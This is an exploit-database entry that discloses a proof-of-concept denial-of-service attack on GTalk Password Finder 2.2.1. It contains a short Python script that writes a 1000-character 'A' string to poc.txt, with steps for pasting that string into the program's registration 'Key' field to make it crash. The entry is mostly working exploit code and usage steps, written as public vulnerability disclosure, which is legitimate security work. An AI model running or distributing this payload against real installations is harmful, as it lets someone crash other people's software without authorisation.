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GTalk Password Finder 2.2.1 Denial Of Service

🗓️ 17 Jan 2020 00:00:00Reported by Ismail TasdelenType 
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GTalk Password Finder 2.2.1 Denial Of Service exploit, creates a file with a large payload causing software cras

Code
`# Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)  
# Exploit Author: Ismail Tasdelen  
# Exploit Date: 2020-01-16  
# Vendor Homepage : http://www.nsauditor.com/  
# Link Software : http://www.nsauditor.com/downloads/gpwdfinder_setup.exe  
# Tested on OS: Windows 10  
# CVE : N/A  
  
'''  
Proof of Concept (PoC):  
=======================  
  
1.Download and install GTalk Password Finder  
2.Run the python operating script that will create a file (poc.txt)  
3.Run the software "Register -> Enter Registration Code  
4.Copy and paste the characters in the file (poc.txt)  
5.Paste the characters in the field 'Key' and click on 'Ok'  
6.GTalk Password Finder Crashed  
'''  
  
#!/usr/bin/python  
  
buffer = "A" * 1000  
  
payload = buffer  
try:  
f=open("poc.txt","w")  
print("[+] Creating %s bytes evil payload." %len(payload))  
f.write(payload)  
f.close()  
print("[+] File created!")  
except:  
print("File cannot be created.")  
`

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